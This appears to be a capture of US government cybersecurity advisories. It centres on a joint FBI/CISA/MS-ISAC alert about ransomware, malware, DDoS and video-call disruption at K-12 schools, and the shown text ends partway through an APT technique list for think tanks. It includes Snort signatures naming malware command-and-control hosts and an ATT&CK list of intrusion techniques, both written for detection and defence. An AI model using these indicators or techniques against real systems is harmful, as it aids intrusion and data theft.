AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments
Original release date: January 8, 2021SummaryThis Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.
This Ale…
AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations
Original release date: December 17, 2020SummaryThis Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) version 8 framework. See the ATT&CK for Enterprise version 8 for all referenced threat actor tactics and te…
AA20-345A: Cyber Actors Target K-12 Distance Learning Education to Cause Disruptions and Steal Data
Original release date: December 10, 2020<br/><h3>Summary</h3><p>This Joint Cybersecurity Advisory was coauthored by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC).</p>
<p>The FBI, CISA, and MS-ISAC assess malicious cyber actors are targeting kindergarten through twelfth grade (K-12) educational institutions, leading to ransomware attacks, the theft of data, and the disruption of distance learning services. Cyber actors likely view schools as targets of opportunity, and these types of attacks are expected to continue through the 2020/2021 academic year. These issues will be particularly challenging for K-12 schools that face resource limitations; therefore, educational leadership, information technology personnel, and security personnel will need to balance this risk when determining their cybersecurity investments.</p>
<p><a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-345A_Joint_Cybersecurity_Advisory_Distance_Learning_S508C.pdf”>Click here</a> for a PDF version of this report.</p>
<h3>Technical Details</h3><p>As of December 2020, the FBI, CISA, and MS-ISAC continue to receive reports from K-12 educational institutions about the disruption of distance learning efforts by cyber actors.</p>
<h4>Ransomware</h4>
<p>The FBI, CISA, and MS-ISAC have received numerous reports of ransomware attacks against K-12 educational institutions. In these attacks, malicious cyber actors target school computer systems, slowing access, and—in some instances—rendering the systems inaccessible for basic functions, including distance learning. Adopting tactics previously leveraged against business and industry, ransomware actors have also stolen—and threatened to leak—confidential student data to the public unless institutions pay a ransom.</p>
<p>According to MS-ISAC data, the percentage of reported ransomware incidents against K-12 schools increased at the beginning of the 2020 school year. In August and September, 57% of ransomware incidents reported to the MS-ISAC involved K-12 schools, compared to 28% of all reported ransomware incidents from January through July.</p>
<p>The five most common ransomware variants identified in incidents targeting K-12 schools between January and September 2020—based on open source information as well as victim and third-party incident reports made to MS-ISAC—are Ryuk, Maze, Nefilim, AKO, and Sodinokibi/REvil.</p>
<h4>Malware</h4>
<p>Figure 1 identifies the top 10 malware strains that have affected state, local, tribal, and territorial (SLTT) educational institutions over the past year (up to and including September 2020). Note: These malware variants are purely opportunistic as they not only affect educational institutions but other organizations as well.</p>
<p>ZeuS and Shlayer are among the most prevalent malware affecting K-12 schools.</p>
<ul>
<li>ZeuS is a Trojan with several variants that targets Microsoft Windows operating systems. Cyber actors use ZeuS to infect target machines and send stolen information to command-and-control servers.</li>
<li>Shlayer is a Trojan downloader and dropper for MacOS malware. It is primarily distributed through malicious websites, hijacked domains, and malicious advertising posing as a fake Adobe Flash updater. <strong>Note: </strong>Shlayer is the only malware of the top 10 that targets MacOS; the other 9 affect Microsoft Windows operating systems</li>
</ul>
<p class=”text-align-center”><img alt=”” data-entity-type=”file” data-entity-uuid=”ee5aa08d-fe73-44e6-8f7d-4b5e6ac08320″ height=”275″ src=”https://us-cert.cisa.gov/sites/default/files/publications/Top%2010%20Malware%20-%20K-12.png” width=”614″ /></p>
<p class=”text-align-center”><cite>Figure 1: Top 10 malware affecting SLTT educational institutions</cite></p>
<h4><cite> </cite><br />
Distributed Denial-of-Service Attacks</h4>
<p>Cyber actors are causing disruptions to K-12 educational institutions—including third-party services supporting distance learning—with distributed denial-of-service (DDoS) attacks, which temporarily limit or prevent users from conducting daily operations. The availability of DDoS-for-hire services provides opportunities for any motivated malicious cyber actor to conduct disruptive attacks regardless of experience level. <strong>Note:</strong> DDoS attacks overwhelm servers with a high level of internet traffic originating from many different sources, making it impossible to mitigate at a single source.</p>
<h4>Video Conference Disruptions</h4>
<p>Numerous reports received by the FBI, CISA, and MS-ISAC since March 2020 indicate uninvited users have disrupted live video-conferenced classroom sessions. These disruptions have included verbally harassing students and teachers, displaying pornography and/or violent images, and doxing meeting attendees (<strong>Note: </strong>doxing is the act of compiling or publishing personal information about an individual on the internet, typically with malicious intent). To enter classroom sessions, uninvited users have been observed:</p>
<ul>
<li>Using student names to trick hosts into accepting them into class sessions, and</li>
<li>Accessing meetings from either publicly available links or links shared with outside users (e.g., students sharing links and/or passwords with friends).</li>
</ul>
<p>Video conference sessions without proper control measures risk disruption or compromise of classroom conversations and exposure of sensitive information.</p>
<h3>Additional Risks and Vulnerabilities</h3>
<p>In addition to the recent reporting of distance learning disruptions received by the FBI, CISA, and MS-ISAC, malicious cyber actors are expected to continue seeking opportunities to exploit the evolving remote learning environment.</p>
<h4>Social Engineering</h4>
<p>Cyber actors could apply social engineering methods against students, parents, faculty, IT personnel, or other individuals involved in distance learning. Tactics, such as phishing, trick victims into revealing personal information (e.g., password or bank account information) or performing a task (e.g., clicking on a link). In such scenarios, a victim could receive what appears to be legitimate email that:</p>
<ul>
<li>Requests personally identifiable information (PII) (e.g., full name, birthdate, student ID),</li>
<li>Directs the user to confirm a password or personal identification number (PIN),</li>
<li>Instructs the recipient to visit a website that is compromised by the cyber actor, or</li>
<li>Contains an attachment with malware.</li>
</ul>
<p>Cyber actors also register web domains that are similar to legitimate websites in an attempt to capture individuals who mistype URLs or click on similar looking URLs. These types of attacks are referred to as domain spoofing or homograph attacks. For example, a user wanting to access <code>www.cottoncandyschool.edu</code> could mistakenly click on <code>www.cottencandyschool.edu</code> (changed “<code>o</code>” to an “<code>e</code>”) or <code>www.cottoncandyschoo1.edu</code> (changed letter “<code>l</code>” to a number “1”) (<strong>Note:</strong> this is a fictitious example to demonstrate how a user can mistakenly click and access a website without noticing subtle changes in website URLs). Victims believe they are on a legitimate website when, in reality, they are visiting a site controlled by a cyber actor.</p>
<h4>Technology Vulnerabilities and Student Data</h4>
<p>Whether as collateral for ransomware attacks or to sell on the dark web, cyber actors may seek to exploit the data-rich environment of student information in schools and education technology (edtech) services. The need for schools to rapidly transition to distance learning likely contributed to cybersecurity gaps, leaving schools vulnerable to attack. In addition, educational institutions that have outsourced their distance learning tools may have lost visibility into data security measures. Cyber actors could view the increased reliance on—and sharp usership growth in—these distance learning services and student data as lucrative targets.</p>
<h4>Open/Exposed Ports</h4>
<p>The FBI, CISA, and MS-ISAC frequently see malicious cyber actors exploiting exposed Remote Desktop Protocol (RDP) services to gain initial access to a network and, often, to manually deploy ransomware. For example, cyber actors will attack ports 445 (Server Message Block [SMB]) and 3389 (RDP) to gain network access. They are then positioned to move laterally throughout a network (often using SMB), escalate privileges, access and exfiltrate sensitive information, harvest credentials, or deploy a wide variety of malware. This popular attack vector allows cyber actors to maintain a low profile, as they are using a legitimate network service that provides them with the same functionality as any other remote user.</p>
<h4>End-of-Life Software</h4>
<p>End-of-Life (EOL) software is regularly exploited by cyber actors—often to gain initial access, deface websites, or further their reach in a network. Once a product reaches EOL, customers no longer receive security updates, technical support, or bug fixes. Unpatched and vulnerable servers are likely to be exploited by cyber actors, hindering an organization’s operational capacity.</p>
<h3>Mitigations</h3><h4>Plans and Policies</h4>
<p>The FBI and CISA encourage educational providers to maintain business continuity plans—the practice of executing essential functions through emergencies (e.g., cyberattacks)—to minimize service interruptions. Without planning, provision, and implementation of continuity principles, institutions may be unable to continue teaching and administrative operations. Evaluating continuity and capability will help identify potential operational gaps. Through identifying and addressing these gaps, institutions can establish a viable continuity program that will help keep them functioning during cyberattacks or other emergencies. The FBI and CISA suggest K-12 educational institutions review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by cyber actors.</p>
<h4>Network Best Practices</h4>
<ul>
<li>Patch operating systems, software, and firmware as soon as manufacturers release updates.</li>
<li>Check configurations for every operating system version for educational institution-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.</li>
<li>Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.</li>
<li>Use multi-factor authentication where possible.</li>
<li>Disable unused remote access/RDP ports and monitor remote access/RDP logs.</li>
<li>Implement application and remote access allow listing to only allow systems to execute programs known and permitted by the established security policy.</li>
<li>Audit user accounts with administrative privileges and configure access controls with least privilege in mind.</li>
<li>Audit logs to ensure new accounts are legitimate.</li>
<li>Scan for open or listening ports and mediate those that are not needed.</li>
<li>Identify critical assets such as student database servers and distance learning infrastructure; create backups of these systems and house the backups offline from the network.</li>
<li>Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.</li>
<li>Set antivirus and anti-malware solutions to automatically update; conduct regular scans.</li>
</ul>
<h4>User Awareness Best Practices</h4>
<ul>
<li>Focus on awareness and training. Because end users are targeted, make employees and students aware of the threats—such as ransomware and phishing scams—and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.</li>
<li>Ensure employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.</li>
<li>Monitor privacy settings and information available on social networking sites.</li>
</ul>
<h4>Ransomware Best Practices</h4>
<p>The FBI and CISA do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, regardless of whether your organization decided to pay the ransom, the FBI urges you to report ransomware incidents to your local FBI field office. Doing so provides the FBI with the critical information they need to prevent future attacks by identifying and tracking ransomware attackers and holding them accountable under U.S. law.</p>
<p>In addition to implementing the above network best practices, the FBI and CISA also recommend the following:</p>
<ul>
<li>Regularly back up data, air gap, and password protect backup copies offline.</li>
<li>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.</li>
</ul>
<h4>Denial-of-Service Best Practices</h4>
<ul>
<li>Consider enrolling in a denial-of-service mitigation service that detects abnormal traffic flows and redirects traffic away from your network.</li>
<li>Create a partnership with your local internet service provider (ISP) prior to an event and work with your ISP to control network traffic attacking your network during an event.</li>
<li>Configure network firewalls to block unauthorized IP addresses and disable port forwarding.</li>
</ul>
<h4>Video-Conferencing Best Practices</h4>
<ul>
<li>Ensure participants use the most updated version of remote access/meeting applications.</li>
<li>Require passwords for session access.</li>
<li>Encourage students to avoid sharing passwords or meeting codes.</li>
<li>Establish a vetting process to identify participants as they arrive, such as a waiting room.</li>
<li>Establish policies to require participants to sign in using true names rather than aliases.</li>
<li>Ensure only the host controls screensharing privileges.</li>
<li>Implement a policy to prevent participants from entering rooms prior to host arrival and to prevent the host from exiting prior to the departure of all participants.</li>
</ul>
<h4>Edtech Implementation Considerations</h4>
<ul>
<li>When partnering with third-party and edtech services to support distance learning, educational institutions should consider the following:</li>
<li>The service provider’s cybersecurity policies and response plan in the event of a breach and their remediation practices:
<ul>
<li>How did the service provider resolve past cyber incidents? How did their cybersecurity practices change after these incidents?</li>
</ul>
</li>
<li>The provider’s data security practices for their products and services (e.g., data encryption in transit and at rest, security audits, security training of staff, audit logs);</li>
<li>The provider’s data maintenance and storage practices (e.g., use of company servers, cloud storage, or third-party services);</li>
<li>Types of student data the provider collects and tracks (e.g., PII, academic, disciplinary, medical, biometric, IP addresses);</li>
<li>Entities to whom the provider will grant access to the student data (e.g., vendors);</li>
<li>How the provider will use student data (e.g., will they sell it to—or share it with—third parties for service enhancement, new product development, studies, marketing/advertising?);</li>
<li>The provider’s de-identification practices for student data; and</li>
<li>The provider’s policies on data retention and deletion.</li>
</ul>
<h4>Malware Defense</h4>
<p>Table 1 identifies CISA-created Snort signatures, which have been successfully used to detect and defend against related attacks, for the malware variants listed below. <strong>Note:</strong> the listing is not fully comprehensive and should not be used at the exclusion of other detection methods.</p>
<p class=”text-align-center”><em>Table 1: Malware signatures</em></p>
<table border=”1″ cellpadding=”1″ cellspacing=”1″ class=”general-table” style=”width: 881.46px; height: 312px; margin-right: auto; margin-left: auto;”>
<thead>
<tr>
<th scope=”col” style=”width: 198px;”><strong>Malware</strong></th>
<th scope=”col” style=”width: 356px;”>Signature</th>
</tr>
</thead>
<tbody>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”><strong>NanoCore</strong></td>
<td scope=”col” style=”width: 356px; text-align: left;”><code>alert tcp any any -> any $HTTP_PORTS (msg:”NANOCORE:HTTP GET URI contains ‘FAD00979338′”; sid:00000000; rev:1; flow:established,to_server; content:”GET”; http_method; content:”getPluginName.php?PluginID=FAD00979338″; fast_pattern; http_uri; classtype:http-uri; metadata:service http;) </code></td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”>
<p><strong>Cerber</strong></p>
</td>
<td scope=”col” style=”width: 356px; text-align: left;”><code>alert tcp any any -> any $HTTP_PORTS (msg:”HTTP Client Header contains ‘host|3a 20|polkiuj.top'”; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:”host|3a 20|polkiuj.top|0d 0a|”; http_header; fast_pattern:only; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;) </code></td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”><strong>Kovter</strong></td>
<td scope=”col” style=”width: 356px; text-align: left;”><code>alert tcp any any -> any $HTTP_PORTS (msg:”Kovter:HTTP URI POST to CnC Server”; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:”POST / HTTP/1.1″; depth:15; content:”Content-Type|3a 20|application/x-www-form-urlencoded”; http_header; depth:47; fast_pattern; content:”User-Agent|3a 20|Mozilla/”; http_header; content:!”LOADCURRENCY”; nocase; content:!”Accept”; http_header; content:!”Referer|3a|”; http_header; content:!”Cookie|3a|”; nocase; http_header; pcre:”/^(?:[A-Za-z0-9+\/]{4})*(?:[A-Za-z0-9+\/]{2}==|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{4})$/P”; pcre:”/User-Agent\x3a[^\r\n]+\r\nHost\x3a\x20(?:\d{1,3}\.){3}\d{1,3}\r\nContent-Length\x3a\x20[1-5][0-9]{2,3}\r\n(?:Cache-Control|Pragma)\x3a[^\r\n]+\r\n(?:\r\n)?$/H”; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:nonstd-tcp; metadata:service http;)</code></td>
</tr>
<tr>
<td scope=”col” style=”width: 198px; text-align: left;”><strong>Dridex</strong></td>
<td scope=”col” style=”width: 356px; text-align: left;”>
<p><code>alert tcp any any -> any $HTTP_PORTS (msg:”HTTP URI GET contains ‘invoice_########.doc’ (DRIDEX)”; sid:00000000; rev:1; flow:established,to_server; content:”invoice_”; http_uri; fast_pattern:only; content:”.doc”; nocase; distance:8; within:4; content:”GET”; nocase; http_method; classtype:http-uri; metadata:service http;)<br />
alert tcp any any -> any $HTTP_PORTS (msg:”HTTP Client Header contains ‘Host|3a 20|tanevengledrep ru’ (DRIDEX)”; sid:00000000; rev:1; flow:established,to_server; flowbits:isnotset,<unique_ID>.tagged; content:”Host|3a 20|tanevengledrep|2e|ru|0d 0a|”; http_header; fast_pattern:only; flowbits:set,<unique_ID>.tagged; tag:session,10,packets; classtype:http-header; metadata:service http;)</code></p>
</td>
</tr>
</tbody>
</table>
<h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”https://www.fbi.gov/contact-us/field-offices”>www.fbi.gov/contact-us/field</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting organization; and a designated point of contact.</p>
<p>To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govmailto:Central@cisa.gov”>Central@cisa.gov</a>.</p>
<h3>Resources</h3>
<p>MS-ISAC membership is open to employees or representatives from all public K-12 education entities in the United States. The MS-ISAC provides multiple cybersecurity services and benefits to help K-12 education entities increase their cybersecurity posture. To join, visit <a href=”https://learn.cisecurity.org/ms-isac-registration”>https://learn.cisecurity.org/ms-isac-registration</a>.</p>
<ul>
<li><a href=”https://www.cisa.gov/telework”>CISA Telework Guidance and Resources</a></li>
<li><a href=”https://www.cisa.gov/publication/secure-video-conferencing-schools”>CISA Cybersecurity Recommendations and Tips for Schools Using Video Conferencing</a></li>
<li><a href=”https://us-cert.cisa.gov/Ransomware”>CISA Ransomware Publications</a></li>
<li><a href=”https://www.cisa.gov/emergency-services-sector-continuity-planning-suite”>CISA Emergency Services Sector Continuity Planning Suite</a></li>
<li><a href=”https://www.cisa.gov/publication/ransomware-guide”>CISA-MS-ISAC Joint Ransomware Guide</a></li>
<li><a href=”https://us-cert.cisa.gov/ncas/tips/ST04-014″>CISA Tip: Avoiding Social Engineering and Phishing Attacks</a></li>
<li><a href=”https://www.us-cert.gov/ncas/tips/ST04-006″>CISA Tip: Understanding Patches</a></li>
<li><a href=”https://cyber.org/cybersafety”>CISA and CYBER.ORG “Cyber Safety Video Series” for K-12 students and educators</a></li>
<li><a href=”https://www.ic3.gov/media/2019/191002.aspx”>FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations</a></li>
</ul>
<p><strong>Note: </strong>contact your local FBI field office (<a href=”http://www.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>) for additional FBI products on ransomware, edtech, and cybersecurity for educational institutions.</p>
<h3>Revisions</h3>
<ul> <li>Initial Version: December 10, 2020</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy & Use</a> policy.</p>
</div>
AA20-336A: Advanced Persistent Threat Actors Targeting U.S. Think Tanks
Original release date: December 1, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the <a href=”https://attack.mitre.org/versions/v7/techniques/enterprise/”>ATT&CK for Enterprise</a> for all referenced threat actor tactics and techniques.</em></p>
<p>The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have observed persistent continued cyber intrusions by advanced persistent threat (APT) actors targeting U.S. think tanks. This malicious activity is often, but not exclusively, directed at individuals and organizations that focus on international affairs or national security policy.[<a href=”https://www.cyberscoop.com/european-think-tanks-hack-microsoft-fancy-bear-russia/”>1</a>] The following guidance may assist U.S. think tanks in developing network defense procedures to prevent or rapidly detect these attacks.</p>
<p>APT actors have relied on multiple avenues for initial access. These have included low-effort capabilities such as spearphishing emails and third-party message services directed at both corporate and personal accounts, as well as exploiting vulnerable web-facing devices and remote connection capabilities. Increased telework during the COVID-19 pandemic has expanded workforce reliance on remote connectivity, affording malicious actors more opportunities to exploit those connections and to blend in with increased traffic. Attackers may leverage virtual private networks (VPNs) and other remote work tools to gain initial access or persistence on a victim’s network. When successful, these low-effort, high-reward approaches allow threat actors to steal sensitive information, acquire user credentials, and gain persistent access to victim networks.</p>
<p>Given the importance that think tanks can have in shaping U.S. policy, CISA and FBI urge individuals and organizations in the international affairs and national security sectors to immediately adopt a heightened state of awareness and implement the critical steps listed in the Mitigations section of this Advisory.</p>
<p><a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf”>Click here</a> for a PDF version of this report.</p>
<h3>Technical Details</h3><h4>ATT&CK Profile</h4>
<p>CISA created the following MITRE ATT&CK profile to provide a non-exhaustive list of tactics, techniques, and procedures (TTPs) employed by APT actors to break through think tanks’ defenses, conduct reconnaissance in their environments, exfiltrate proprietary or confidential information, and execute effects on targets. These TTPs were included based upon closed reporting on APT actors that are known to target think tanks or based upon CISA incident response data.</p>
<ul>
<li><em><strong>Initial Access</strong></em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0001″>TA0001</a>]
<ul>
<li><i>Valid Accounts </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1078/”>T1078</a>]</li>
<li><i>Valid Accounts: Cloud Accounts </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1078/004/”>T1078.004</a>]</li>
<li><i>External Remote Services </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1133/”>T1133</a>]</li>
<li><i>Drive-by Compromise</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1189″>T1189</a>]</li>
<li><i>Exploit Public-Facing Application</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1190″>T1190</a>]
<ul>
<li><i>Supply Chain Compromise: Compromise Software Supply Chain</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1195/002″>T1195.002</a>]</li>
<li><i>Trusted Relationship</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1199″>T1199</a>]</li>
<li><i>Phishing: Spearphishing Attachment</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/001″>T1566.001</a>]</li>
<li><i>Phishing: Spearphishing Link</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/002″>T1566.002</a>]</li>
<li><i>Phishing: Spearphishing via Service</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1566/003″>T1566.003</a>]</li>
</ul>
</li>
</ul>
</li>
<li><i><em><strong>Execution</strong></em></i> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0002″>TA0002</a>]
<ul>
<li><i>Windows Management Instrumentation </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1047″>T1047</a>]</li>
<li><i>Scheduled Task/Job: Scheduled Task </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1053/005″>T1053.005</a>]</li>
<li><i>Command and Scripting Interpreter: PowerShell </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/001″>T1059.001</a>]</li>
<li><i>Command and Scripting Interpreter: Windows Command Shell</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/003″>T1059.003</a>]</li>
<li><i>Command and Scripting Interpreter: Unix Shell</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/004″>T1059.004</a>]</li>
<li><i>Command and Scripting Interpreter: Visual Basic </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/005″>T1059.005</a>]</li>
<li><i>Command and Scripting Interpreter: Python </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/006″>T1059.006</a>]</li>
<li><i>Native API </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1106″>T1106</a>]</li>
<li><i>Exploitation for Client Execution</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1203″>T1203</a>]</li>
<li><i>User Execution: Malicious Link </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1204/001″>T1204.001</a>]</li>
<li><i>User Execution: Malicious File</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1204/002″>T1204.002</a>]</li>
<li><i>Inter-Process Communication: Dynamic Data Exchange </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1559/002/”>T1559.002</a>]</li>
<li><i>System Services: Service Execution </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1569/002″>T1569.002</a>]</li>
</ul>
</li>
<li><i><em><strong>Persistence</strong></em></i> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003″>TA0003</a>]
<ul>
<li><i>Boot or Logon Initialization Scripts: Logon Script (Windows)</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1037/001″>T1037.001</a>]</li>
<li><i>Scheduled Task/Job: Scheduled Task</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1053/005″>T1053.005</a>]</li>
<li><i>Account Manipulation: Exchange Email Delegate Permissions </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1098/002″>T1098.002</a>]</li>
<li><i>Create Account: Local Account</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1136/001″>T1136.001</a>]</li>
<li><i>Office Application Startup: Office Test </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1137/002″>T1137.002</a>]</li>
<li><i>Office Application Startup: Outlook Home Page</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1137/004″>T1137.004</a>]</li>
<li><i>Browser Extensions</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1176″>T1176</a>]</li>
<li><i>BITS Jobs</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1197/”>T1197</a>]</li>
<li><i>Server Software Component: Web Shell</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1505/003″>T1505.003</a>]</li>
<li><i>Pre-OS Boot: Bootkit</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1542/003/”>T1542.003</a>]</li>
<li><i>Create or Modify System Process: Windows Service</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1543/003″>T1543.003</a>]</li>
<li><i>Event Triggered Execution: Change Default File Association</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/001″>T1546.001</a>]</li>
<li><i>Event Triggered Execution: Windows Management Instrumentation Event Subscription </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/003″>T1546.003</a>]</li>
<li><i>Event Triggered Execution: Accessibility Features</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/008″>T1546.008</a>]</li>
<li><i>Event Triggered Execution: Component Object Model Hijacking</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/015″>T1546.015</a>]</li>
<li><i>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001″>T1547.001</a>]</li>
<li><i>Boot or Logon Autostart Execution: Shortcut Modification</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/009″>T1547.009</a>]</li>
</ul>
</li>
<li><i><em><strong>Privilege Escalation</strong></em></i> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0004″>TA0004</a>]
<ul>
<li><i>Process Injection</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055″>T1055</a>]</li>
<li><i>Process Injection: Process Hollowing</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1055/012″>T1055.012</a>]</li>
<li><i>Exploitation for Privilege Escalation</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1068″>T1068</a>]</li>
<li><i>Access Token Manipulation: Token Impersonation/Theft</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1134/001″>T1134.001</a>]</li>
<li><i>Event Triggered Execution: Accessibility Features </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/008″>T1546.008</a>]</li>
<li><i>Boot or Logon Autostart Execution: Shortcut Modification</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/009″>T1547.009</a>]</li>
<li><i>Abuse Elevation Control Mechanism: Bypass User Access Control</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1548/002″>T1548.002</a>]</li>
<li><i>Hijack Execution Flow: DLL Side-Loading</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1574/002″>T1574.002</a>]</li>
</ul>
</li>
<li><i><em><strong>Defense Evasion</strong></em></i> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0005″>TA0005</a>]
<ul>
<li><i>Rootkit</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1014″>T1014</a>]</li>
<li><i>Obfuscated Files or Information: Binary Padding </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1027/001″>T1027.001</a>]</li>
<li><i>Obfuscated Files or Information: Software Packing </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1027/002″>T1027.002</a>]</li>
<li><i>Obfuscated Files or Information: Steganography</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1027/003″>T1027.003</a>]</li>
<li><i>Obfuscated Files or Information: Indicator Removal from Tools</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1027/005″>T1027.005</a>]</li>
<li><i>Masquerading: Match Legitimate Name or Location</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1036/005″>T1036.005</a>]</li>
<li><i>Indicator Removal on Host: Clear Windows Event Logs</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/001″>T1070.001</a>]</li>
<li><i>Indicator Removal on Host: Clear Command History</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/003″>1070.003</a>]</li>
<li><i>Indicator Removal on Host: File Deletion</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/004″>T1070.004</a>]</li>
<li><i>Indicator Removal on Host: Timestomp</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1070/006″>T1070.006</a>]</li>
<li><i>Modify Registry</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1112″>T1112</a>]</li>
<li><i>Deobfuscate/Decode Files or Information </i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1140″>T1140</a>]</li>
<li><i>Exploitation for Defense Evasion</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1211″>T1211</a>]</li>
<li><i>Signed Binary Proxy Execution: Compiled HTML File</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/001″>T1218.001</a>]</li>
<li><i><em>Signed Binary Proxy Execution: Mshta</em></i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/005″>T1218.005</a>]</li>
<li><i>Signed Binary Proxy Execution:<em> Rundll32 </em></i>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1218/011″>T1218.011</a>]</li>
<li><i>Template Injection</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1221″>T1221</a>]</li>
<li><i>Execution Guardrails: Environmental Keying</i> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1480/001″>T1480.001</a>]</li>
